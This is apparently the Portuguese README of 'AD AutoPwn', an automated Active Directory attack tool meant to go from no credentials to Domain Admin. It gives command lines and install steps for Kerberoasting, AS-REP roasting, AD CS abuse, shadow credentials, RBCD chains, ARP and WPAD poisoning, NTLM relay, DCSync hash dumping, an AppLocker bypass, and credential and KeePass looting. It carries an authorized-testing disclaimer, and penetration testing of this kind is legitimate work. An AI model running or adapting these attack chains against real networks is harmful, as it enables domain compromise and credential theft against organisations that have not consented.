
AD AutoPwn v4.10.0 — cadeia de ataque AD automatizada, de zero-autenticação a Administrador de Domínio. Discover/Kerberoast/AS-REP/AD CS ESC1-16/Shadow Creds/RBCD+KCD/Ghost-SPN/TGS-rewrite/Dollar-Ticket/WPAD/WSUS/PXE/SCCM/BloodHound auto-action/Loot/DCSync/DPAPI + reflexão Synacktiv 2026 (CVE-2025-58726/2026-24294/2026-26128). Apenas para teste de penetração autorizado.
Zero-Auth para Domain Admin — Cadeia de Ataque Automatizada ao Active Directory
Uma ferramenta de teste de penetração totalmente automatizada que encadeia mais de 25 técnicas de ataque para comprometer ambientes Active Directory. Projetada para avaliações de segurança autorizadas.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Zero-Auth para Domain Admin — Cadeia de Ataque
Discover | Sniff | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url em compartilhamentos graváveisbloodhound-python -c All coleta + análise ZIPWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → upgrade ghost-SPN (CVE-2025-58726)AddKeyCredentialLink → shadow credentials → PKINIT → NT hashGenericAll / WriteAccountRestrictions on Computer → cadeia RBCD → TGS admin-altservice, em uma fase-altservice$ na pesquisa de principal → TGT para usuário Linux via conta de máquina <user>$ criada automaticamente → SSH GSSAPIGet-CimInstance Win32_Process via nxc -x; grep de regex para senhas em flags dos tipos mysql/sqlcmd/runas/KeePass/--password*.kdbx em C:\Users, baixar via smbclient, keepass2john | hashcat -m 13400# Totalmente automatizado — cadeia zero-credenciais (auto-descobre tudo)
sudo ./ad-autopwn.py
# Com credenciais — cadeia completa
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# Laboratórios AWS / VPC (ataques de Camada 2 bloqueados) — auto-descoberta ainda funciona
sudo ./ad-autopwn.py --no-arp --no-wpad
# Descoberta de credenciais pré-autenticação (seguro contra bloqueio)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# Coleta de grafo BloodHound + análise automática de alto valor
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT para 'root' via conta de máquina root$ criada automaticamente
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# Cadeia RBCD+KCD — ghost-SPN completo + RBCD + reescrita altservice, em um tiro
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# Bypass AppLocker
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# Execução simulada (imprime cada comando, não executa nada — até processos em segundo plano)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — baixe o binário mais recente em
https://github.com/ropnop/kerbrute/releases — instale em /usr/local/bin/userenum-cldap — enumerador companheiro CLDAP NetLogon-ping (reside
neste repositório como userenum-cldap.py; instale em /usr/local/bin/userenum-cldap)asn1tools — pip install asn1tools (dependência de tempo de execução do CLDAP enum)# Pacotes APT
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# Todos os repositórios necessários
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# Dependências Python para repositórios que as necessitam
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Pacotes Pipx
pipx install coercer
pipx install wsuks --system-site-packages
# Binário kerbrute (ropnop)
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# Dependência de tempo de execução do CLDAP userenum
sudo pip3 install --break-system-packages asn1tools
# Script companheiro userenum-cldap (deste repositório)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# O próprio ad-autopwn
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() é executado no início de cada invocação e exibe
um status verde ✅ / amarelo ⚠️ para cada ferramenta que o script utiliza, com
dicas de instalação para qualquer item ausente.
eu-west-1 — cobertura completa da fase v4.10.0 verificada
ponta a ponta. A auto-descoberta na AWS agora funciona com apenas
--no-arp --no-wpad (todo o resto — interface, IP do atacante,
domínio, IP do DC, FQDN do DC — é detectado automaticamente via varredura de sub-rede + fallback dig
para @<dc_ip>).stannis.baratheon → GenericAll → KINGSLANDING$: de uma única
credencial de baixo privilégio a um TGS de admin no DC em 5 segundos.krbtgt — golden ticket viável.--dry-run imprime cada comando (em primeiro plano e em segundo plano) sem
executar — não gerará ARP spoofers, mitm6, Responder ou ntlmrelayx.try/finally com os.chdir
para garantir que a restauração ocorra no diretório correto em qualquer caminho de saída.--no-cleanup mantém tudo para revisão forense.Apenas para testes de penetração autorizados e pesquisa de segurança.
Esta ferramenta foi projetada para uso por profissionais de segurança durante compromissos autorizados. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha permissão por escrito antes de testar.
Triop AB — https://triop.se
MIT
| Fase | Auth | Descrição |
|---|
full | opcional | Cadeia automatizada completa (detecta automaticamente com ou sem credenciais) |
sniff | nenhum | Descoberta passiva de tráfego L2 |
discover | nenhum | kerbrute + CLDAP + AS-REP + pre2k + (opt-in) spray |
arp | nenhum | ARP spoof + captura NTLM |
wpad | nenhum | Envenenamento WPAD/LLMNR (mitm6 / Responder) |
wsus | nenhum | Relay NTLM WSUS |
pxe | nenhum | Roubo de credenciais de boot PXE |
enum | sim | Enumeração de alvos (alvos de relay, delegação irrestrita, hosts WebClient) |
enrich | sim | Bateria de 13 módulos nxc (LAPS, timeroast, MAQ, nopac, zerologon, …) + consumidor automático |
bloodhound | sim | bloodhound-python -c All + análise + cadeias de ação automáticas |
roast | sim | Kerberoast + AS-REP Roast |
adcs | sim | Exploração AD CS (ESC1-ESC16) |
sccm | sim | Roubo de credenciais NAA do SCCM |
exploit | sim | Exploração de reflexão/coerção NTLM em um alvo específico |
dcsync | sim (DA) | Despejo de hashes do domínio |
loot | sim | Colheita de linha de comando de processos + descoberta/quebra de KeePass |
tgs-rewrite | nenhum | Reescrita offline de sname ccache (bypass KCD estilo tgssub) |
dollar-ticket | sim | Ataque de nova tentativa com sufixo $ no KDC (alvo Linux GSSAPI) |
rbcd-kcd | sim | Orquestrador de cadeia RBCD+KCD completo (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | sim | Primitiva LPE CVE-2026-24294 (SMB-em-porta-TCP) |
reflect-loopback | sim | Primitiva LPE CVE-2026-26128 (loopback Kerberos via SPN Unicode) |
kerb-reflect | sim | Reflexão AP-REQ ghost-SPN CVE-2025-58726 |